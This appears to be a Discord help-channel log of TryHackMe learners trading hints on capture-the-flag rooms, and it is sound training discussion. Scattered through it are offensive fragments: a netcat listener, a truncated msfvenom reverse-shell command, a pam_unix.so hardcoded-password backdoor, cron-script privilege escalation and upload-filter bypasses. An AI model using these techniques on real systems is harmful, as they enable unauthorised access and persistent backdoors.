Alright, I'm still stuck on that network service room but now on the telnet exploitation. I have the attack box listening with nc and used the command that was given in the task's text and prefixed it with .RUN; still can't seem to get a reverse shell going.
only thing I didn't do exactly like the command is I used the eth0 IP instead of tun0 since I'm using the attack box and I didn't have a tun0 in ifconfig
did you open a listening port on your machine?
Oh yeah you do, sorry
yup, used nc -lvp 4444
The payload is like starts with mkfifo right?
I'd guess the issue is with the other command, since I'm not getting the message with the payload
I don't have that part
I know I should but I don't know what I done wrong
that whole string that msfvenom spit out onto the terminal, starting with mkfifo: you pasted that whole thing into the backdoor service input and prefixed it with .RUN [exploit]?
That's incorrect. You should re-read this part:
So I should run it on my local machine instead
try it out
Notice how the text talks about two different things:
**We're going to generate** a reverse shell payload using msfvenom
and at the bottom:
What word does **the generated payload** start with?
msfvenom here is the tool that will be generating the payload. The payload being a reverse shell that we will be running as a system command on the target machine using this open telnet connection.
What is the name used to identify the device responsible for sending data to another network?
Which room are you in?
It's not router then if it's not accepting it.
That's my hint.
What can it be then
Just google the question please
So with questions for every task, the questions should be answered based on the information presented in that task.
So read through that information again now that you've read the question and I think you might see it there yourself.
Another tip for you when answering questions is to match the asterisks and if your answer is letters short or has more letters than asterisks then it's not the answer.
Umm ok lemme try to figure it out
Sure! And remember to take your time as you are learning the material. It's okay to read things again and again. Good luck!
tq brovi
Can u tell me the task and question number if u don't mind
I got it no worries. Read the context of the task
last question
Yeah, I just spun up THM and saw that
oh ok
oh ok lemme find out
this was the mistake
got the ans
awesome!
thanks brovi
https://tryhackme.com/room/commonlinuxprivesc, task 9:
I'm supposed to guess what command script is running. How do I do that..? It looks like I just changed user or sth, but su is not the answer.
Maybe you should try to find 'script' and then see if you can read it
There's a bunch of gibberish in there, but I just tricked the answer tolerance on the next question, presenting me with the needed command after reloading the page. The answer is ||ls|| and I really don't know why or how I would have known that because afaic, ||ls|| doesn't do what's seen in the screenshot I sent. 0.o
you can run the script and see how it behaves π
though if it's an ELF file you can probably try to disassemble it
and you'd probably want to use ./script
I feel really dumb right now lol
that happens
it's a silly mistake that happens a lot
you're basically going to abuse that same mistake that the dev made
It also doesn't really help that script is an actual command (which I just found out), which is why I thought the file "script" was doing sth else
Well, thank you
Yeah, that's what I meant
Hello guys!
Please help. I've been struggling on downloading the .ps1 file on the remote machine via Jenkins in the Alfred room...
This is the error I always get :weary: :weary:
"Unable to connect to the remote host server"
Rooms can't connect to the Internet. Looks like you're trying to download something within the machine direct from the internet and I don't believe that is possible
I'm working on Chill Hack. I've gotten my own public key into the authorized_keys for one of the users, but I'm hitting a wall on privesc. Is there anyone here that's done it that could be so kind as to PM me the slightest whiff of a hint as to which direction I should be looking?
Hello folks! I'm on Upload Vulnerabilities, Task 9, Magic Numbers. I was able to bypass the filter with the Magic Number trick but when they say I'll need to activate the shell by "going directly to its url." I go directly to the URL in browser, the file downloads, but I'm not seeing anything on my listener. Does this mean something isn't right in the script, or I'm performing a step wrong? Or is there another methodology I need to take? Do I need to edit my script to...activate? idk ¯\_(ツ)_/¯
do I have to do a bind shell
Hey, How can I get machine credentials?
You'll need to use your VPN ip
I am in room Basic Pentesting and I want to log in with ssh. But I do not know the password
Regular Rev shell should work, is your uploaded file correct?
Hey, I am doing the attacktive directory room and really stuck on the kerbrute tool
as I can't get it with the go command
installed go step by step and I can get hello world as it was from the examples to verify go functions
but go get github.com/ropnop/kerbrute
nothing happens
nevermind
Hi all, I'm stuck with the room SESH Birthday task 2 question 9. Managed to get and decode the password from the totallytopsecret.pdf, however not sure if I am looking in the correct path at the store address and phone number to get the username
appreciate if someone can give a little hint
the target machines don't have internet access
i don't try to install kerbrute on target
ok then
You need to search for it. Gobuster has a switch that allows for searching with custom extensions on the end (php, txt, etc) use that
Also try not to show answers when posting questions. You do show an answer in that image
Oh yeah my bad, thanks though! I'll try using Gobuster, I used FFUF
FFUF probably has a switch as well
I have never used FFUF tho, lots of tools available that do this
Oh yeah it does have an extension switch, I was overthinking it and was thinking I'd have to use multiple FUZZes, I'll try using the extension switch, that should do it
Thanks again for the help!
Thanks bro, I thought of this as well since there are not in same LAN but I've done something like this before and it worked.. I used it to transfer a file to attackbox I was using then..
Now, I set up a python server but it is only serving my directory on 0.0.0.0
Is there a way I can start a server with a specific network interface?
If possible, I will just start the server with my thm VPN ip
0.0.0.0 means everyone can connect
The script you were trying to run is trying to connect to a webserver. You either need to modify the script to point towards your python server and let it download whatever it needs from your machine, or use a different script that doesn't require to connect to another machine to execute.
That answer your question?
I'm using a .php5 extension with the Magic Number changed to indicate GIF at the beginning of the file.
I'll do pentestmonkey without any Magic Number change
is that how I'm supposed to access the file? Directly to its path in the browser window?
yup
Thanks bro.
I will work on that
@ripe hedge After I've changed the Magic Number, is the extension supposed to sit on top of the body of the text like this? I submitted, went to the URL but it just had the command echoed out in the browser...
WHAT AM I MISSING (╯°□°）╯︵ ┻━┻
you'll need to execute some actual php though
omfg
the parser's probably going mad now
GOT IT
gotta throw out an official thank you for the help!
glad you got it working
don't worry though, sometimes your brain just shuts down and the lizard takes over
I'm really stuck at Pickle Rick ctf
I have been enumerating for the last 2 hours and only found /server-status/ lmao
I have found robots.txt and the username, any advice on how to proceed?
Try using a bigger wordlist
You mean that the medium word list isn't enough?
Ok I'll give it a shot
Wait the directory-list-2.3-medium is the biggest one lmao
there are bigger wordlists. the hint is in the word. If you are using Kali Linux you should have this wordlist already
nope. the wordlist I used is in the wordlists area. from there maybe try using the 'find' binary to look for it. the name of it is big
i wouldnt say wrong
you just need to move to a bigger wordlist if a smaller one is not hitting anything
@dire otter also note, sometimes they are just rabbit holes there to annoy and no matter how large a wordlist is, you won't find anything
this isnt the case to be clear
There is more to find. Big.txt found it for me
Yeah i found nothing
Mind if I DM you?
Ffs found the rabbit hole
Basic Pentesting: how to brute-force credentials? I wanted to use hydra, but don't know where the wordlists with logins are.
Try it in /usr/share/wordlists
https://tryhackme.com/room/rocket Any hints for foothold?
Looking for some help, stuck on SMB Task4 . I cannot get current user correct that im currently connected as. Cannot download the file locally
Got the user
So you are fine now?
No stuck at the final step of task 4
I got what i need. User error.
For passwords use rockyou
That's what I actually used)
I know its a good wordlist
You still didn't get the password after using that?
No, i already finished that room
I had a problem with geting logins, but after few machines restarts i got them
Oh got it. Congrats, man
Thanks for trying to help)
No problem
In CC: Pen Testing task 4, I can't seem to get gobuster running on the kali browser machine. I've tried searching the system using find. I've tried installing it using sudo apt-get install gobuster, I don't know if the kali machine uses go or if I should try the attackbox. Any suggestions would be greatly appreciated. Thanks in advance.
You installed gobuster on kali? What does the output look like when you run gobuster? And also have you installed golang on kali?
I have tried but it wouldn't let me, and I haven't installed golang yet. I will try
This is what its showing me:
I'm getting similar errors, ie E: Failed to fetch..., when trying to install gobuster
I got the same messages
basically a bunch of 404 errors on IP: 192.99.200.113 80
Here is the output:
This might be the problem from your kali repositories.. have a look at this https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
And, are your package upgraded and kali up-to-date?
I'm using the in browser version. I made the mistake of accidentally upgrading it and I basically ran out of time before the box was usable again.
by "in browser" the one provided by tryhackme
Ohh the Attackbox
right, but I'm differentiating it because it isn't the "attackbox" but the kali box
but yes
Well, I haven't tried to installed anything on attackbox, personally. So am not sure if I can provide any solutions. But imo, attackbox comes with pre-installation of tools and there might not need to install the tools by the user. See if you locate the tool with locate command
turns up nothing. That being said, maybe I should just jump on the regular old attackbox. And if that doesn't work, I should probably spin up a kali vm. I really appreciate your help
gobuster is available on the Attackbox. Probably should have checked there first. Thank you hellfire0x01
@ember cosmos What question?
Any hint for Privilege Escalation?
@ember cosmos Look for a file lennie owns that you can adjust.
@ember cosmos you got it.
Yeah but How can I run planner.sh as root?
Now find a way to use that file to get you root access.
you don't need to. if you check crontab that might help you understand.
The crontab is not having any script scheduled to be run
@ember cosmos cron is running the planner.sh file often. Reading that file it also runs the print.sh file which you can edit.
I expected this in the beginning
@ember cosmos Sorry, pspy shows this running each minute.
principle is still the same. Edit the file and get root.
hey i'm doing the CC: pen Testing and I can't find the answer for the 6th question of the 5th Task. Could someone help me ?
I was thinking about -mutate
Hi, I'm stuck in Sweettooth Inc. room on the Privilege escalation step. I have run linux-smart-enumeration (lse.sh -l 2) and I can't find anything that I can use from there. I'm definitely missing something. Any hints on what I should look for next?
There is a dedicated channel for this room #868235399733055580
@left thunder thanks. I didn't know that. I'll go check there
Any ideas ?
Have you googled for it already in case you can't find it otherwise?
Yeah for more then an hour
I also looked at the manual online, the github page and the terminal manual
@fallow ibex Copy the question into google, answer is in the first response. (you don't even need to click into it)
xD thx guess i was looking too much for a flag
Room Investigating Windows :
i don't understand how too know what tool was used to get Windows passwords..
@median grail which task/question?
there only is one task in this room
and the question is What tool was used to get Windows passwords?
@median grail Start with the task scheduler.
You're looking for a task. Maybe the actions of that task will help you.
i know, but i don't find what is wrong in the list of tasks
I was not looking in the right place
sorry
@median grail you figured it out?
yes !
super
aloooooooooooooooooooooooo
I'm stuck in the One Piece machine (https://tryhackme.com/room/ctfonepiece65)
I've decrypted the hash in the web page source code, but now I'm stuck
someone of you could give me a little hint?
Buffer Overflow prep: I completed OVERFLOW1 and got a shell, just completed OVERFLOW2. However netcat isn't picking up a shell. Is that by design, or am I doing something wrong?
In the network services room on Task 7: Exploiting Telnet I'm not clear on which lhost IP and lport values I should be using. I've tried setting lhost as attacking machine IP and lport values as 4444 but nothing ever happens
Something has happened b/c now when I telnet in I am not getting the standard welcome message which allows you to run .HELP or .RUN etc.
lhost should be your local machine ip
i would do ifconfig on your local machine, find out the ip address of tun0 and then use that for your lhost....
Hey, I'm struggling with network services Task 6, where I have to scan the machine and find the open port. When I scan the first 10,000 ports with "nmap -p0-10000 'ip' -Pn" nmap says that all 10,000 ports are filtered. Did I miss something?
Try to define what type of scan you want to perform. So maybe add -sS to your nmap command
Your command works for me. There is no need to set syn scan because is the default. Double check your VPN and target IP.
Oh, that's default anyways. Didn't know that
Okay, I'll try it again tomorrow, thanks
Room: startup. There is file in ||incident|| directory. Can that be transfer on our machine? Because I'm trying to transfer it but it requires password which I don't have. I am a ||www-data|| user. Any nudge?
You mean the attack box right?
Nvm, I figured it out. (:
Yes
Hello all.
Please help your homeboy
I'm having issues getting a reverse shell via msf.
I created the .exe payload from the msfvenom command in the first command in the picture above and I got it transferred to the remote machine with the second command...
I fired msf and set all my required options making sure the parameters are same with what I set up in the .exe payload above...
Once I start the process, I just didn't get any shell:sob: :sob: :sob: :sob:
I noticed, if I run 'Start-Process' as specified in the walkthrough above, it won't be recognized because it is a PowerShell command and not a native cmd command, so I used 'Start payload.exe'
Is that supposed to be the reason??
yes, the attack box tun0 ip address
drop me a direct message if you still having issues with this π
@bold beacon So what I still don't understand is what exactly the issue is? You are not getting the flag, or you can't find the correct page for this question?
So what's the url you tried to open in order to receive the flag for this question?
Well then you need to read more carefully, that's not the correct url
Hello, I'm working on the bolt room and I can't figure out the version. The msfconsole used 3.7.0 and I've tried a few different version numbers. Any idea how I can get the version number from the server?
Could even be the first word I'm using. I'm kinda stumped. DM can be sent. Thank you.
someone know what is answer on Deploy the interactive lab using the "View Site" button and spoof your MAC address to access the site. What is the flag?
because it can't show me the answer
what browser are you using
hello, I just finished the linux backdoor room but I have just one question about the pam_unix.so backdoor. The new password added is "0xmitusrugi"? And if I want to change it, do I need to replace the string?
try firefox, that was the one I was able to get it to work on
okay
Hi @graceful pewter you are hardcoding a backdoor password and replacing the library pam_unix.so. Every time you want to change this password you will need recompile and replace the original on /lib/x86_64-linux-gnu/security. If you need any help about please DM.
Sent you a friend request so I can DM you
Looks like I can't DM you unless you're a friend
So I am trying to complete " Sweettooth Inc." room and I can't find what I need to do to become root. Pls help
Hi, I was doing steel mountain & got this kind of weird thing: whenever I try to execute any powershell cmd it just doesn't output anything. Is this a bug or just kind of a Windows thing (I'm not very good with Windows boxes)
ls is a linux command
PowerShell should accept ls as well (maybe that's depending on the version, not sure about that).
Though I agree @twin mesa you should try native windows commands that you can also use in a normal command prompt
I've tried dir as well but nothing returned
Might be because of the shell itself. You can try these commands in a meterpreter session directly without entering a system shell.
CMD is working fine but not the powershell
Maybe the shell is not stable
this is a possibility
The third task on this page has a problem. I am not able to access the THM{...} code.
What should I do?
I did the task the way it was asked. but there was no text box or explanation box, like how it was with other ones.
yeah. It was replication, right?
What browser you're using ?
I mean spoofing, by copy pasting that other mac... I will check my notif settings.
Yeah it is
Are you doing the room on Google Chrome, Firefox or an other ?
I know that sometimes bugs happen with Chrome on interactive site
Try it in a different browser, or open the site in an own page instead of the splitscreen and do the task, then it's working. https://static-labs.tryhackme.cloud/sites/hotel-wifi/
Try with Firefox maybe
Notifs and most settings including cookies are allowed.
I will try this first... full screen.
How do we do this. no option to open on new tab
That's why I gave you the link
No problem, did it work?
yess!
Great π
May I ask something in dm?
Just one more thing if that's happening again. You can open the simulator site as usual in splitscreen, right click that page and inspect, there you will find the link for it in the html code
Ye, go ahead
thank you.
ow, nice!
Vulnversity task5 priv esc: I managed to get a shell as www-data, and am trying to transfer an enum script from the attack box to the target machine via python3 -m http.server 8080 (while in the folder of enum scripts). When I try to wget from the target machine as www-data, I get a permission denied - cannot write to (name of enum script). Any hint if I'm doing something wrong or if the low priv www-data is in general not allowed to do this kind of wget download? Thanks a lot!
Already solved it :) needed to find a writable directory via "find / -type d -writable"
hello all
I'm in the middle of the network services lesson and can't get the reverse shell to work off msfvenom -p cmd/unix/reverse_netcat ....
any ideas I can see the ping response but the netcat listener is getting nothing
Please be more detailed, what task, are you on a VM, the attackbox or just your own linux machine. In case it could be helpful, a screenshot.
Well you are trying to run msfvenom on the target machine, but you have to do that on your own machine in order to create the payload
ok I got it thanks. Misunderstood that part thanks
No problem
Thanks for the help
Hi guys, it's about the room https://tryhackme.com/room/webenumerationv2. Actually it's about gobuster and the -x flag. Scanning the first time and adding php to the -x flag doesn't show any files. If I dirscan the virtualhost and add txt to the -x flag it shows the flag. Any explanation why it doesn't work on webenum.thm but it works on products.webenum.thm?
You're scanning a subdomain which can have different webpages and files within it.
I am in the enumerating telnet room and I need to run an nmap scan to find the open port, and when I run this: nmap -sT IP -vv, it says all ports are closed due to conn-refused
I would try a different scan option than -sT
Hi All, I'm on chillhack (easy) and have a shell as www-data but I don't know what to do next. I see the .helpline.sh script but I can't find a way to edit it. Any hints would be great! thanks
Did you figure this out? I'm having the same issue. I'm currently www-data
What's the type of hash in Daily Bugle, or how do you crack it?
it seems to take an eternity to crack johan's password
Yeah, at last I had to look at the write-up.
I can give you a spoiler if you want one. In that case just let me know; otherwise, there is something that you can find in gtfobins
@ember cosmos Thanks, I just got a one of the users accounts for ssh. Hopefully about to get root flag. Thanks for replying
hi, I cannot complete https://tryhackme.com/room/steelmountain, I cannot find the exact PowerShell command to list unquoted services
What powershell -c command could we run to manually find out the service name?
I found a few ways to do that but not the expected one
any hint ?
did it with PowerUp and winPEAS
you got winPEAS running?
I did both exploitations but not that PowerShell command
That command is a native PowerShell command
yes, I looked at a couple of them, get-service for example
yeah that's the one if i remember correctly
Could anyone help me with some guidance for the question regarding the MTA running an SMTP server (room Network Services 2)
the expected command is 10 characters long, followed by a space, 2 characters, a space, and 13 characters
get-service is 11
i got both flags but got stuck with this question
the question is What powershell -c command could we run to manually find out the service name?
Format is "powershell -c "command here"
powershell -c "get-service"
Really? I don't know what the answer is then.. I'm sure it was "get-service"
yeah ..... that one KO'd my brain
I'm looking at the writeups and the last 3 are saying powershell -c Get-Service
or powershell -c "Get-Service"
sorry. I'm not sure why that isn't working for you
how about 'powershell -c "getservice"'
man, you made my day
powershell -c Get-Service
I got it right but got confused the way it was asked
thank you very much
Hey all, stuck on finding the registry key for question 27 on Investigating Windows 3.x... any help would be greatly appreciated
hi, I'm trying to change the permissions of id_rsa, but when I change them I still can't connect via ssh
i got this message
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for '/mnt/nf/tmp/id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "/mnt/nf/tmp/id_rsa": bad permissions
kenobi@10.10.196.163's password:
Can someone help me?
@stark pike use chmod 600 on the file that you want ssh to read.
I used
Did you use 600 or 644?
600
@stark pike I think the id_rsa key is encrypted. Use the tool ssh2john to get the password out of the key.
I was looking at some RSA keys and I think mine isn't encrypted because it is not like this one
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9A447029ABFAC605
-----END RSA PRIVATE KEY-----
In mine there is nothing saying that it is encrypted
after changing the permissions, what error does it give now?
also what's the output of openssl rsa -in id_rsa -check
(don't paste actual key material here if it's not related to a room etc.)
Let's not.. please..
that seems drastic
It's not alright to joke about and if you weren't joking, I will be happy to point you to plenty of resources on how to help with depression and suicidal ideation. @stark pike
chill i was joking
oh sorry
@stark pike namei can be a good tool to check on permissions of a folder/file and all of its parent folders, for future reference.
i already got the accesses
thanks
and
@trim haven sorry, I know that suicide is drastic
I didn't mean to
It's okay :)
Thank you for apologising, I really appreciate that.
I am still trying to run an nmap scan on this telnet room and have tried all the scan types I know, and it keeps saying conn refused or that it's blocking out probes, or the scan takes forever
Screenshot your OpenVPN output log?
Please
And send it here
You may need to verify
!docs verify
I've done other rooms also
What command are you using?
Are you using the AttackBox?
No I'm just using my Linux vm
I did nmap -sT IP -vv
Also
nmap -sT -p- IP
Also -sS
So, -p- will always take forever
If the machine says it's blocking your probes and you add -Pn, it will always take longer; nmap also tells you it will take longer.
I would recommend just going in with nmap -T4 -sV machine_ip
If it tells you that the probes are being blocked, throw a -Pn on the end, but there's not really much else you can do unless you change the min-rate (or switch to rustscan).
Usually Windows machines will require -Pn, fyi, due to ICMP pings (iirc): they don't always respond to them, so nmap presumes the host is down
so the -T4 is some timing thing right?
Mhm
also thank you for the help
I'm scanning a room right now and it's taking forever, not really much I can do.
nmap -T4 -sV machine_ip
just ran this one but all 1000 closed, so I need to add -p-, right?
to scan all ports
Yup